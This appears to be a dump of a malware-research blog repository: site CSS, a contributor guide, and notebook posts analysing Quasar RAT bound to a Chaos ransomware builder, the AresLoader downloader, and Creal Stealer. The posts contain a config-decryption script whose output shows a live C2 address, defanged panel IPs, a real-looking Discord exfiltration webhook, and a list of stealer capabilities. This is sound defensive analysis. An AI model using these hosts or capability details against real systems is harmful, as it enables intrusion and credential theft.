149 | margin-bottom: .25em !important;
150 | font-size: 105%;
151 | }
152 |
153 | .page-description {
154 | margin-top: .5rem !important;
155 | margin-bottom: .5rem !important;
156 | color: #585858;
157 | font-size: 115%;
158 | }
159 |
160 | // Custom styling for category tags
161 | .category-tags-icon {
162 | font-size: 75% !important;
163 | padding-left: 0.375em;
164 | opacity: 35%;
165 | }
166 | .category-tags-link {
167 | color:rgb(187, 129, 129) !important;
168 | font-size: 13px !important;
169 | }
170 |
171 | // Search Page Styles
172 | .js-search-results {padding-top: 0.2rem;}
173 | .search-results-list-item {padding-bottom: 1rem;}
174 | .search-results-list-item .search-result-title {
175 | font-size: 16px;
176 | color: #d9230f;
177 | }
178 | .search-result-rel-url {color: silver;}
179 | .search-results-list-item a {display: block; color: #777;}
180 | .search-results-list-item a:hover, .search-results-list-item a:focus {text-decoration: none;}
181 | .search-results-list-item a:hover .search-result-title {text-decoration: underline;}
182 |
183 | .search-result-rel-date {
184 | color: rgb(109, 120, 138);
185 | font-size: 14px;
186 | }
187 |
188 | .search-result-preview {
189 | color: #777;
190 | font-size: 16px;
191 | margin-top:.02rem !important;
192 | margin-bottom:.02rem !important;
193 | }
194 | .search-result-highlight {
195 | color: #2e0137;
196 | font-weight:bold;
197 | }
198 |
199 | table {
200 | white-space: normal;
201 | max-width: 100%;
202 | font-size: 100%;
203 | border:none;
204 | th{
205 | text-align: center! important;
206 | }
207 | }
208 |
209 | // customize scrollbars
210 | ::-webkit-scrollbar {
211 | width: 14px;
212 | height: 18px;
213 | }
214 | ::-webkit-scrollbar-thumb {
215 | height: 6px;
216 | border: 4px solid rgba(0, 0, 0, 0);
217 | background-clip: padding-box;
218 | -webkit-border-radius: 7px;
219 | background-color: #9D9D9D;
220 | -webkit-box-shadow: inset -1px -1px 0px rgba(0, 0, 0, 0.05), inset 1px 1px 0px rgba(0, 0, 0, 0.05);
221 | }
222 | ::-webkit-scrollbar-button {
223 | width: 0;
224 | height: 0;
225 | display: none;
226 | }
227 | ::-webkit-scrollbar-corner {
228 | background-color: transparent;
229 | }
230 |
231 | // Wrap text outputs instead of horizontal scroll
232 | .output_text.output_execute_result {
233 | pre{
234 | white-space: pre-wrap;
235 | }
236 | }
237 |
238 |
239 | // Handling large charts on mobile devices
240 | // @media only screen and (max-width: 1200px) {
241 | // /* for mobile phone and tablet devices */
242 | .output_wrapper{
243 | overflow: auto;
244 | }
245 | // }
246 |
247 | .svg-icon.orange{
248 | width: 30px;
249 | height: 23px;
250 | }
251 |
252 | .code_cell {
253 | margin: 1.5rem 0px !important;
254 | }
255 |
256 | pre code {
257 | font-size: 15px !important;
258 | }
259 |
260 | // Handle youtube videos, so they dont break on mobile devices
261 | .youtube-iframe-wrapper {
262 | position: relative;
263 | padding-bottom: 56.10%;
264 | height: 0;
265 | overflow: hidden;
266 | }
267 |
268 | .youtube-iframe-wrapper iframe,
269 | .youtube-iframe-wrapper object,
270 | .youtube-iframe-wrapper embed {
271 | position: absolute;
272 | top: 0;
273 | left: 0;
274 | width: 100%;
275 | height: 100%;
276 | }
277 |
--------------------------------------------------------------------------------
/_notebooks/2023-04-13-quasar-chaos.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "32353fa6-6311-459f-96ee-7f31d6edfa84",
6 | "metadata": {},
7 | "source": [
8 | "# Quasar Chaos\n",
9 | "> Open Source Ransomware Meets Open Source RAT\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [Quasar,Chaos,RAT,Ransomware]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "3164276f-ff44-4120-9054-282a1a33493a",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "a4326c6f-e720-45fb-b779-d66ae32eef1b",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "This sample appears to be a Chaos Ransomware builder but it is actually bound with Quasar RAT!!\n",
31 | "\n",
32 | "- Binder: [Celesty Binder](https://github.com/cymilad/Celesty_Binder)\n",
33 | "- PDB path: `C:\\Users\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb`\n",
34 | "- Chaos Ransomware [malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos)\n",
35 | "\n",
36 | "\n",
37 | "\n",
38 | "## Samples\n",
39 | "- `141056b82cd0a20495822cd2bcd5fae5c989c6d24dac5a5e3c3916f1b406bdb9` [UnpacMe](https://www.unpac.me/results/f56d1ef0-daf5-4da7-b8cb-b2438fe30379#/)"
40 | ]
41 | },
42 | {
43 | "cell_type": "markdown",
44 | "id": "6447e821-4e87-4736-8ddb-358c3739d669",
45 | "metadata": {},
46 | "source": [
47 | "## Chaos Builder\n",
48 | "Chaos Ransomware builder is an open source project that can be found on GitHub [ChaosRansomwareBuilderVersion4](https://github.com/GlebYoutuber/ChaosRansomwareBuilderVersion4). It appears that this project was compiled then the Celesty Binder was used to bind the ransomware builder with Quasar RAT. Both the builder and the RAT can be found in the resources section of the binder exe.\n",
49 | "\n",
50 | "The extracted builder is a clean build and will work on its own `f2665f89ba53abd3deb81988c0d5194992214053e77fc89b98b64a31a7504d77`\n",
51 | "\n",
52 | "\n",
53 | "## Quasar RAT\n",
54 | "Quasar is ostensibly a \"remote administration tool\" (RAT) that is open source and available on GitHub [Quasar](https://github.com/quasar/Quasar). Looking through the source this appears to be developed for the purpose of unauthorized remote access to victims and includes a [configuration](https://github.com/quasar/Quasar/blob/master/Quasar.Client/Config/Settings.cs) that could turn this into a malicious RAT. \n",
55 | "\n",
56 | "The extracted RAT `d8b36742b4c5cf9ce5ce58ac859c4162fb127298dfd3f15fa4f101c0cb878bda`\n",
57 | "\n",
58 | "### Analysis \n",
59 | "\n",
60 | "The strings in the RAT (config) are encrypted using Base64 and AES CBC. "
61 | ]
62 | },
63 | {
64 | "cell_type": "code",
65 | "execution_count": 5,
66 | "id": "1a8eff35-b1d5-4949-a304-72606c4a9f7e",
67 | "metadata": {},
68 | "outputs": [
69 | {
70 | "name": "stdout",
71 | "output_type": "stream",
72 | "text": [
73 | "b'1.3.0.0\\t\\t\\t\\t\\t\\t\\t\\t\\t'\n",
74 | "b'66.63.167.164:55640;\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c'\n",
75 | "b'\\xf6H\\xcf\\xc9\\x87`\\x96\\xb7N\\xe7O\\xf1i\\x8d\\xc1\\xf7'\n",
76 | "b'SubDir\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n'\n",
77 | "b'Client.exe\\x06\\x06\\x06\\x06\\x06\\x06'\n",
78 | "b'QSR_MUTEX_M6ajmD3hhoJo7CTsvN\\x04\\x04\\x04\\x04'\n",
79 | "b'Quasar Client Startup\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b\\x0b'\n",
80 | "b'Ransomware\\x06\\x06\\x06\\x06\\x06\\x06'\n",
81 | "b'Logs\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c'\n"
82 | ]
83 | }
84 | ],
85 | "source": [
86 | "import base64\n",
87 | "import malduck\n",
88 | "from Crypto.Protocol.KDF import PBKDF2\n",
89 | "\n",
90 | "\n",
91 | "\n",
92 | "\n",
93 | "string_data = 'muoBJw7vz107HYcI4tyRBz0XVW2kCA367J52yCDjuHUkVGWPKkpXUgV5Q1/s4HNhSAMJDhTJwYIa3MxqdMkg7A=='\n",
94 | "\n",
95 | "string_data_b64 = base64.b64decode(string_data)\n",
96 | "string_data_b64 = string_data_b64[32:]\n",
97 | "iv = string_data_b64[:16]\n",
98 | "enc_data = string_data_b64[16:]\n",
99 | "\n",
100 | "key_data = \"SM73jcn259KtoJ4uPciZ\"\n",
101 | "\n",
102 | "iterations = 50000\n",
103 | "salt = bytes([191,235,30,86,251,205,151,59,178,25,2,36,48,165,120,67,0,61,86,68,210,30,98,185,212,241,128,231,230,195,57,65])\n",
104 | "\n",
105 | "\n",
106 | "key = PBKDF2(key_data, salt, count=iterations)\n",
107 | "\n",
108 | "\n",
109 | "strings = [\n",
110 | "\"3DaXS6MYqYL9Q/3WF/cPdbdoy2NggCqoSmasPYwzkPD389j4IoSZZVQHHz196cPEy2h4VSsjy7se22/++XH89w==\",\n",
111 | "\"U2MkYAPUljFBQRO9iIkRZVGmxS2mOB+3klWr1xcKn3OqiosSod4C8iKk+GmogWRVZ6xUFktvHtwFnyOxg+ZSLPjbO+3+OdrVI8o+NK7UCZA=\",\n",
112 | "\"1WvgEMPjdwfqIMeM9MclyQ==\",\n",
113 | "\"NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==\",\n",
114 | "\"NX2L76Nud+1o8CF2fRs8qiHu4v2wb0E701jiqZNY+WP0X+oOZUuIpza8zsipPF550Uz4XlYTbeon9njxoQ2MBA==\",\n",
115 | "\"DQSIoMapurAvRyZWC74v/c0E7zcV+8LgDPpOmChR453N+Cj+6Fwipe5tbYPbhkpNhwf9hEy/78hh8qB6c1B3nw==\",\n",
116 | "\"p56HD6/EQvRGDzCuDAjko6aJqVPRc/Mug3q2bslOWAZN8H2n4vy8m3x0RtwAUXh5C6kG15y+qrvsfs2s4qJHQBdKg5BmNrg62YncQ9tG5TE=\",\n",
117 | "\"xf05S4o+UGg6gPS2slPSroORS4DLfYXnHiWz6VyhTQOpNKzIHxhEvDSTlPMFUIek3Wi3lCxroWOHJr9WeGvvHe6fxXcVPTWnPs4YiYTbmfs=\",\n",
118 | "\"muoBJw7vz107HYcI4tyRBz0XVW2kCA367J52yCDjuHUkVGWPKkpXUgV5Q1/s4HNhSAMJDhTJwYIa3MxqdMkg7A==\",\n",
119 | "\"B0T3cryizrl4VOcnw40TDxor8c5ycs9chw7RjsLxM2h+rS/BlcPa2ZW4po/PpJXob3byyEj4GOuWUPn+M4Shcg==\"]\n",
120 | "\n",
121 | "\n",
122 | "for s in strings:\n",
123 | " try:\n",
124 | " string_data_b64 = base64.b64decode(s)\n",
125 | " string_data_b64 = string_data_b64[32:]\n",
126 | " iv = string_data_b64[:16]\n",
127 | " enc_data = string_data_b64[16:]\n",
128 | " out = malduck.aes.cbc.decrypt(key, iv, enc_data)\n",
129 | " print(out)\n",
130 | " except:\n",
131 | " pass\n",
132 | "\n"
133 | ]
134 | },
135 | {
136 | "cell_type": "code",
137 | "execution_count": null,
138 | "id": "5c0bee7f-4d2b-4492-a40a-47b50865fe27",
139 | "metadata": {},
140 | "outputs": [],
141 | "source": []
142 | }
143 | ],
144 | "metadata": {
145 | "kernelspec": {
146 | "display_name": "Python 3",
147 | "language": "python",
148 | "name": "python3"
149 | },
150 | "language_info": {
151 | "codemirror_mode": {
152 | "name": "ipython",
153 | "version": 3
154 | },
155 | "file_extension": ".py",
156 | "mimetype": "text/x-python",
157 | "name": "python",
158 | "nbconvert_exporter": "python",
159 | "pygments_lexer": "ipython3",
160 | "version": "3.9.5"
161 | }
162 | },
163 | "nbformat": 4,
164 | "nbformat_minor": 5
165 | }
166 |
--------------------------------------------------------------------------------
/_notebooks/2023-04-02-aresloader.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "65fde09f-6b34-4627-ad8e-cf238dc703e2",
6 | "metadata": {},
7 | "source": [
8 | "# AresLoader\n",
9 | "> Taking a closer look at this new loader\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [ares,aresloader,loader]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "2e55128d-8b95-4a5f-a0f0-17a79ac65e57",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "88fecbb4-9283-4336-ad6d-db81a165ab02",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "\n",
31 | "AresLoader is a new malware downloader that has been advertised on some underground forums.\n",
32 | "\n",
33 | "### References \n",
34 | "\n",
35 | "- [New loader on the bloc - AresLoader](https://intel471.com/blog/new-loader-on-the-bloc-aresloader)\n",
36 | "- [Private Malware for Sale: A Closer Look at AresLoader](https://flashpoint.io/blog/private-malware-for-sale-aresloader/)\n",
37 | "\n",
38 | "### Samples \n",
39 | "\n",
40 | "- `7572b5b6b1f0ea8e857de568898cf97139c4e5237b835c61fea7d91a6f1155fb` [UnpacMe](https://www.unpac.me/results/346ab69e-9378-416a-8387-6dae0b87bf58)\n",
41 | "\n",
42 | "### Panels\n",
43 | "\n",
44 | "The following were live panels at the time of analysis (thanks [@lloydlabs](https://twitter.com/lloydlabs))\n",
45 | "\n",
46 | "```\n",
47 | " 45.80.69[.]193\n",
48 | " 37.220.87[.]52\n",
49 | "```\n",
50 | "\n",
51 | "### Note From The Developers\n",
52 | "\n",
53 | "From the the developers themselves!\n",
54 | "\n",
55 | "```\n",
56 | "Dear Customer.\n",
57 | "Here will be described the advantages, the rules of using the lowers you are renting.\n",
58 | "\n",
59 | "Product name: AresLoader.\n",
60 | "\n",
61 | "\n",
62 | "Monthly lease will cost $300. There are no discounts provided. Price includes: 5 rebuilds ( including the first one ), each with a partial stub cleanup ( uniqueization of the binary signature ). Any rebuild after that will cost $50, and this may take some time, since this service is manual, but we will not keep you waiting. \n",
63 | "In addition, manual morphing code (for each build it is different).\n",
64 | "\n",
65 | "==============================\n",
66 | "The way AresLoader works is that it presents itself as legitimate software (not a required feature) and then downloads the payload and puts it on the disk wherever you want. Before launching the payload, Ares launches a legitimate file.\n",
67 | "\n",
68 | "AresLoader can ask the user admin rights (until he allows it) on behalf of cmd.exe and afterwards transfer the rights from cmd.exe to the payload. \n",
69 | "\n",
70 | "Ares supports the ability to load encrypted payloads using AES/RSA ciphers ( only use your own encoder to avoid decryption problems )\n",
71 | "\n",
72 | "For more details about the work and functionality of the builder - contact the team, we are ready to answer any question. As the builder is in the form of a constructor, they can arise.\n",
73 | "\n",
74 | "Due to the fact that the Lauder will be improved and we will be introducing different updates, they may be free or for a fee. In any case, we will notify you about updates and explain what and where they will be updated/modernized. \n",
75 | "\n",
76 | "===============================\n",
77 | "\n",
78 | "\n",
79 | "\n",
80 | "There are rules for use. Attempts to change or break them will be treated critically, up to and including blocking the user. \n",
81 | "\n",
82 | " 1. Resale of license is FORBIDDEN. \n",
83 | " 2. We are not responsible for any loss to the renter. \n",
84 | " 4. It is forbidden to post the Lowder binary file in the public domain. \n",
85 | " 5. It is forbidden to upload the loeder to Virus Total.\n",
86 | "\n",
87 | "\n",
88 | "For our part, the Development team is ready to ensure the comfortable use of our product. Soon we will be adding new updates and other additions to the functionality to improve the performance, increasing the potential of using our AresLoader. In case of any questions we are ready to get in touch with you at any convenient time and solve any arising problems. We are looking for long-term cooperation and diligent customers. \n",
89 | "\n",
90 | "\n",
91 | "Sincerely, developers.\n",
92 | "```\n",
93 | "\n"
94 | ]
95 | },
96 | {
97 | "cell_type": "markdown",
98 | "id": "33096db8-ab3b-4175-857f-14a7ebc9e740",
99 | "metadata": {},
100 | "source": [
101 | "## Analysis\n",
102 | "\n",
103 | "The first stage is \"packed\" with fake API calls used to obscure a simple shellcode loader. The loader loads the 2nd stage onto the heap and executes it (yes you read the right, the heap).\n",
104 | "\n",
105 | "### Stage 2\n",
106 | "\n",
107 | "The 2nd stage uses a custom decryption algorithm to decrypt the final stage which is loaded into a RWX section and executed. The decryption algorithm was previously observed in a malware dubbed [BUGHATCH](https://www.elastic.co/security-labs/bughatch-malware-analysis) by elastic. The overlap between the two malware families is currently unclear.\n",
108 | "\n",
109 | "### Stage 3\n",
110 | "The 3rd and final stage is composed of some shellcode and the AresLoader payload PE file. The shellode is used to execute the PE file.\n",
111 | "\n",
112 | "Based on the strings in the payload this sample is .... `AresLdr_v_3`\n",
113 | "\n",
114 | "The 3rd stage appears to have been around since at least 2021 in some form as this analysis report describes a most of the same functionality [Anatomy of a simple and popular packer](https://malware.news/t/anatomy-of-a-simple-and-popular-packer/48537). \n",
115 | "\n",
116 | "The purpose of the loader is to download and launch a final malware payload (technically making this a downloader not a loader). The download URLs are in plain text in the final stage and the payload is executed via `CreateProcessA`. \n"
117 | ]
118 | },
119 | {
120 | "cell_type": "code",
121 | "execution_count": null,
122 | "id": "5e8d5f2e-a8f6-4b1e-bd1a-96e753a3d7c7",
123 | "metadata": {},
124 | "outputs": [],
125 | "source": []
126 | }
127 | ],
128 | "metadata": {
129 | "kernelspec": {
130 | "display_name": "Python 3",
131 | "language": "python",
132 | "name": "python3"
133 | },
134 | "language_info": {
135 | "codemirror_mode": {
136 | "name": "ipython",
137 | "version": 3
138 | },
139 | "file_extension": ".py",
140 | "mimetype": "text/x-python",
141 | "name": "python",
142 | "nbconvert_exporter": "python",
143 | "pygments_lexer": "ipython3",
144 | "version": "3.9.5"
145 | }
146 | },
147 | "nbformat": 4,
148 | "nbformat_minor": 5
149 | }
150 |
--------------------------------------------------------------------------------
/_fastpages_docs/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | _Adapted from [fastai/nbdev/CONTRIBUTING.md](https://github.com/fastai/nbdev/blob/master/CONTRIBUTING.md)_
2 |
3 | # How to contribute to fastpages
4 |
5 | First, thanks a lot for wanting to help! Some things to keep in mind:
6 |
7 | - The jupyter to blog post conversion functionality relies on [fastai/nbdev](https://github.com/fastai/nbdev). For idiosyncratic uses of nbdev that only apply to blogs that would require a large refactor to nbdev, it might be acceptable to apply a [monkey patch](https://stackoverflow.com/questions/5626193/what-is-monkey-patching) in `fastpages`. However, it is encouraged to contribute to `nbdev` where possible if there is a change that could unlock a new feature. If you are unsure, please open an issue in this repo to discuss.
8 |
9 |
10 | ## Note for new contributors from Jeremy
11 |
12 | It can be tempting to jump into a new project by questioning the stylistic decisions that have been made, such as naming, formatting, and so forth. This can be especially so for python programmers contributing to this project, which is unusual in following a number of conventions that are common in other programming communities, but not in Python. However, please don’t do this, for (amongst others) the following reasons:
13 |
14 | - Contributing to [Parkinson’s law of triviality](https://www.wikiwand.com/en/Law_of_triviality) has negative consequences for a project. Let’s focus on deep learning!
15 | - It’s exhausting to repeat the same discussion over and over again, especially when it’s been well documented already. When you have a question about the project, please check the pages in the docs website linked here.
16 | - You’re likely to get a warmer welcome from the community if you start out by contributing something that’s been requested on the forum, since you’ll be solving someone’s current problem.
17 | - If you start out by just telling us your point of view, rather than studying the background behind the decisions that have been made, you’re unlikely to be contributing anything new or useful.
18 | - I’ve been writing code for nearly 40 years now, across dozens of languages, and other folks involved have quite a bit of experience too - the approaches used are based on significant experience and research. Whilst there’s always room for improvement, it’s much more likely you’ll be making a positive contribution if you spend a few weeks studying and working within the current framework before suggesting wholesale changes.
19 |
20 |
21 | ## Did you find a bug?
22 |
23 | * Nobody is perfect, especially not us. But first, please double-check the bug doesn't come from something on your side. The [forum](http://forums.fast.ai/) is a tremendous source for help, and we'd advise to use it as a first step. Be sure to include as much code as you can so that other people can easily help you.
24 | * Then, ensure the bug was not already reported by searching on GitHub under [Issues](https://github.com/fastai/fastpages/issues).
25 | * If you're unable to find an open issue addressing the problem, [open a new one](https://github.com/fastai/fastpages/issues/new). Be sure to include a title and clear description, as much relevant information as possible, and a code sample or an executable test case demonstrating the expected behavior that is not occurring.
26 | * Be sure to add the complete error messages.
27 |
28 | #### Did you write a patch that fixes a bug?
29 |
30 | * Open a new GitHub pull request with the patch.
31 | * Ensure that your PR includes a test that fails without your patch, and pass with it.
32 | * Ensure the PR description clearly describes the problem and solution. Include the relevant issue number if applicable.
33 | * Before submitting, please be sure you abide by our [coding style](https://docs.fast.ai/dev/style.html) (where appropriate) and [the guide on abbreviations](https://docs.fast.ai/dev/abbr.html) and clean-up your code accordingly.
34 |
35 | ## Do you intend to add a new feature or change an existing one?
36 |
37 | * You can suggest your change on the [fastai forum](http://forums.fast.ai/) to see if others are interested or want to help.
38 | * Once your approach has been discussed and confirmed on the forum, you are welcome to push a PR, including a complete description of the new feature and an example of how it's used. Be sure to document your code in the notebook.
39 | * Ensure that your code includes tests that exercise not only your feature, but also any other code that might be impacted.
40 |
41 | ## PR submission guidelines
42 |
43 | Some general rules of thumb that will make your life easier.
44 |
45 | * Test locally before opening a pull request. See [the development guide](_fastpages_docs/DEVELOPMENT.md) for instructions on how to run fastpages on your local machine.
46 | * When you do open a pull request, please request a draft build of your PR by making a **comment with the magic command `/preview` in the pull request.** This will allow reviewers to see a live-preview of your changes without having to clone your branch.
47 | * You can do this multiple times, if necessary, to rebuild your preview due to changes. But please do not abuse this and test locally before doing this.
48 |
49 | * Keep each PR focused. While it's more convenient, do not combine several unrelated fixes together. Create as many branches as needing to keep each PR focused.
50 | * Do not mix style changes/fixes with "functional" changes. It's very difficult to review such PRs and it most likely get rejected.
51 | * Do not add/remove vertical whitespace. Preserve the original style of the file you edit as much as you can.
52 | * Do not turn an already submitted PR into your development playground. If after you submitted PR, you discovered that more work is needed - close the PR, do the required work and then submit a new PR. Otherwise each of your commits requires attention from maintainers of the project.
53 | * If, however, you submitted a PR and received a request for changes, you should proceed with commits inside that PR, so that the maintainer can see the incremental fixes and won't need to review the whole PR again. In the exception case where you realize it'll take many many commits to complete the requests, then it's probably best to close the PR, do the work and then submit it again. Use common sense where you'd choose one way over another.
54 | * When you open a pull request, you can generate a live preview build of how the blog site will look by making a comment in the PR that contains this command: `/preview`. GitHub will build your site and drop a temporary link for everyone to review. You can do this as multiple times if necessary, however, as mentioned previously do not turn an already submitted PR into a development playground.
55 |
56 | ## Do you have questions about the source code?
57 |
58 | * Please ask it on the [fastai forum](http://forums.fast.ai/) (after searching someone didn't ask the same one before with a quick search). We'd rather have the maximum of discussions there so that the largest number can benefit from it.
59 |
60 | ## Do you want to contribute to the documentation?
61 |
62 | * PRs are welcome for this. For any confusion about the documentation, please feel free to open an issue on this repo.
63 |
64 |
--------------------------------------------------------------------------------
/_notebooks/2024-05-12-python-malware.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# Python Malware Triage - Creal Stealer\n",
8 | "> A Few Tips To Help With PyInstaller And Friends\n",
9 | "\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [python,pyinstaller,triage,creal-stealer,creal]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "metadata": {},
18 | "source": [
19 | "## Overview\n",
20 | "\n",
21 | "Just a few tips and tricks for analyzing python malware...\n",
22 | "\n",
23 | "## Sample\n",
24 | "- `21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a` [UnpacMe](https://www.unpac.me/results/4667304e-fc1d-4fb2-9aec-d4b6e62e18ab?hash=21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a)\n",
25 | "\n",
26 | "## References \n",
27 | "- [Malware Analysis For Hedgehogs - Python Malware In 30sec](https://www.youtube.com/shorts/ETvzwJo0Pa0)\n",
28 | "- [Python Malware Cheatsheet (also Malware Anlaysis For Hedgehogs)](https://struppigel.github.io/WisdomForHedgehogs/Execution%20Environments/CPython%20Bytecode%20Reversing/)\n",
29 | "\n",
30 | "## Creal Stealer\n",
31 | "Creal Stealer is an open source Python stealer shared on GitHub [Ayhuuu/Creal-Stealer)](https://github.com/Ayhuuu/Creal-Stealer). Though the stealer is open source the developer operates a Telegram channel which offers a \"Premium\" version of the stealer if you contact them.\n",
32 | "\n",
33 | "\n",
34 | "\n",
35 | "### Capabilites \n",
36 | "The stealer has a simple discord webhook upload config where the operator can specify a discord to upload the stolen information. According to the developer the stealer is undetected in VirusTotal but this is obviously [not the case](https://www.virustotal.com/gui/file/21a9b4859121afcf6690c2c15b795094986c0a20c36a356c3915f107ec41f67a) in practice. \n",
37 | "\n",
38 | "The following stealer feaures are listed on the GitHub page.\n",
39 | "- Discord Information ⚔️\n",
40 | " - Nitro\n",
41 | " - Badges\n",
42 | " - Billing\n",
43 | " - Email\n",
44 | " - Phone\n",
45 | " - HQ Friends\n",
46 | " - HQ Guilds\n",
47 | " - Gift Codes\n",
48 | "- General Functions \n",
49 | " - Check if being run in a VirusTotal sandbox\n",
50 | " - Adds file to startup\n",
51 | " - Anti-Debug / Anti-VM / Anti-RDP / Blue Screen if detect\n",
52 | "- Discord Injection \n",
53 | " - Send token, password, email and billing on login or when email/password is changed\n",
54 | "- Browser Data\n",
55 | " - Cookies\n",
56 | " - Passwords\n",
57 | " - Histories\n",
58 | " - Autofills\n",
59 | " - Bookmarks\n",
60 | " - Credit/Debit Cards\n",
61 | " - From Chrome, Edge, Brave, Opera GX, and more...\n",
62 | "- Crypto Data \n",
63 | " - Extensions (MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Binance Wallet and +40 wallets supported)\n",
64 | " - Softwares (Exodus, Atomic, Guarda, Electrum, Zcash, Armory, Binance, Coinomi)\n",
65 | " - Seedphrases and backup codes\n",
66 | "- Application Data \n",
67 | " - Steam\n",
68 | " - Riot Games\n",
69 | " - Telegram\n",
70 | "- System Information ⚙️\n",
71 | " - User\n",
72 | " - System\n",
73 | " - Disk\n",
74 | " - Network\n",
75 | "- File Stealer\n",
76 | " - Grabs Seed Phrases, Tokens, Private Keys, Recovery Codes, Backup Codes, 2FA codes\n",
77 | "\n",
78 | "\n"
79 | ]
80 | },
81 | {
82 | "cell_type": "markdown",
83 | "metadata": {},
84 | "source": [
85 | "## Analysis\n",
86 | "Though we are analyzing a creal sample a similar process can be followed for most python malware.\n",
87 | "\n",
88 | "### PyInstaller\n",
89 | "The malware comes bundled in a [PyInstaller](https://pyinstaller.org/) EXE which can be extracted using [https://github.com/pyinstxtractor/pyinstxtractor-ng]. Once extracted the bundled python interpreter, libraries, and compiled python files (`.pyc`) will be accessible.\n",
90 | "\n",
91 | "The Python interpreter DLL will have the Python version name listed in its name. Determining the version is important for the next step in the analysis process. We can also see the `creal.pyc` compiled Creal stealer module has been dumped.\n",
92 | "\n",
93 | "\n",
94 | "\n",
95 | "\n"
96 | ]
97 | },
98 | {
99 | "cell_type": "markdown",
100 | "metadata": {},
101 | "source": [
102 | "### Decompiling Python PYC\n",
103 | "Depending on the Python version determined in the previous step Karsten's excellent [CPython Bytecode Reference Chart](https://struppigel.github.io/WisdomForHedgehogs/Execution%20Environments/CPython%20Bytecode%20Reversing/) can be used to determine the correct decompiler tool to use. Personally I prefer [pycdc](https://github.com/zrax/pycdc) because it can be easily modified to handle any version.\n",
104 | "\n",
105 | "#### Pycdc\n",
106 | "Currently pycdc cannot decompile python versions above 3.9 however it can disassemble them `pycdas`. This will return the disassembled python which is readable but not as easy to follow as the lifted python code.\n",
107 | "\n",
108 | "\n",
109 | "\n",
110 | "In our case the sample is using Python 3.12 and when we attempt to decompile it with pycdc we get some errors and only partial code recovery.\n",
111 | "```\n",
112 | "Unsupported opcode: BEFORE_WITH\n",
113 | "Unsupported opcode: LOAD_FAST_CHECK\n",
114 | "Unsupported opcode: BINARY_SLICE\n",
115 | "Unsupported opcode: JUMP_BACKWARD\n",
116 | "Unsupported opcode: JUMP_BACKWARD\n",
117 | "Unsupported opcode: JUMP_BACKWARD\n",
118 | "```\n",
119 | "\n",
120 | "##### Patched Pycdc\n",
121 | "We can modify pycdc to patch out the instruction case statement default return in `ASTRee.cpp` which causes the analysis to halt when an unknown instruction is encountered. By patching the return we force the analysis to continue. \n",
122 | "\n",
123 | "\n",
124 | "\n",
125 | "\n",
126 | "**Note** this will produce incorrect decompiled code, but depending on which instructions are missing the code may end up very readable, and the disassembly can be used to fill in the gaps. In our case we can fully recover the discord hook url `https[:]//discord[.]com/api/webhooks/1221491784937373859/LiPQTxogVAKpzUO2MXT3CjiqF4qFWy_HT3DpUCrG4D8E0ZVZAGR_3uHvfQog2a0DFQyV'` and the majority of the code!\n",
127 | "\n",
128 | "\n",
129 | "\n"
130 | ]
131 | },
132 | {
133 | "cell_type": "markdown",
134 | "metadata": {},
135 | "source": []
136 | }
137 | ],
138 | "metadata": {
139 | "language_info": {
140 | "name": "python"
141 | }
142 | },
143 | "nbformat": 4,
144 | "nbformat_minor": 2
145 | }
146 |
--------------------------------------------------------------------------------